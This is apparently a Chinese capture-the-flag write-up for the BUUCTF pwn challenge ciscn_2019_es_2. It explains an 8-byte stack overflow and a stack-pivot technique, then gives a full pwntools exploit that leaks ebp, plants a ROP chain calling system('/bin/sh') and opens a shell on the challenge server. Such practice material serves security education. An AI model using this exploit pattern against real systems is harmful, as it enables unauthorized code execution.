BUUCTF-Pwn-ciscn_2019_es_2

题目截图
BUUCTF-Pwn-ciscn_2019_es_2_第1张图片
例行检查
BUUCTF-Pwn-ciscn_2019_es_2_第2张图片
同IDA打开查看字符串,找到system函数和一个与flag相关的字符串
BUUCTF-Pwn-ciscn_2019_es_2_第3张图片
利用交叉引用找到Hack函数,其中调用了system函数,但是参数并不能让我们getshell或者得到flag
BUUCTF-Pwn-ciscn_2019_es_2_第4张图片
继续查看主函数
BUUCTF-Pwn-ciscn_2019_es_2_第5张图片
查看函数vul(),存在栈溢出,但是只溢出了8个字节,只能覆盖ebp和ret,可以考虑使用栈迁移
BUUCTF-Pwn-ciscn_2019_es_2_第6张图片
函数vul()中有两次输入和两次输出,可以利用第一次输入和输出泄露ebp的值、计算栈顶地址、布置栈,然后再利用第二次输入覆盖ebp和ret进行栈迁移,再次回到栈顶,执行我们布置好的rop链
使用动调计算上一个栈的大小为0x10,保存的为上一个栈的ebp,所以利用栈的栈顶地址为泄露ebp-0x10-0x28
BUUCTF-Pwn-ciscn_2019_es_2_第7张图片

exp

from pwn import *
path='/home/lhb/桌面/ciscn_2019_es_2'
elf=ELF(path)
p=remote('node4.buuoj.cn', 26511)
system_plt=elf.plt['system']
leave_ret=0x80485fd
payload=b'a'*(0x27)
p.recv()
p.sendline(payload)

addr=u32(p.recvuntil(p32(0x804862a))[-8:-4])

payload=p32(addr)
payload+=p32(system_plt)+p32(0)+p32(addr-0x28)
payload+=b'/bin/sh\0'+b'a'*(0x28-16-8)
payload+=p32(addr-0x38)+p32(leave_ret)
p.sendline(payload)

p.interactive()

你可能感兴趣的:(CTF,Pwn,其他)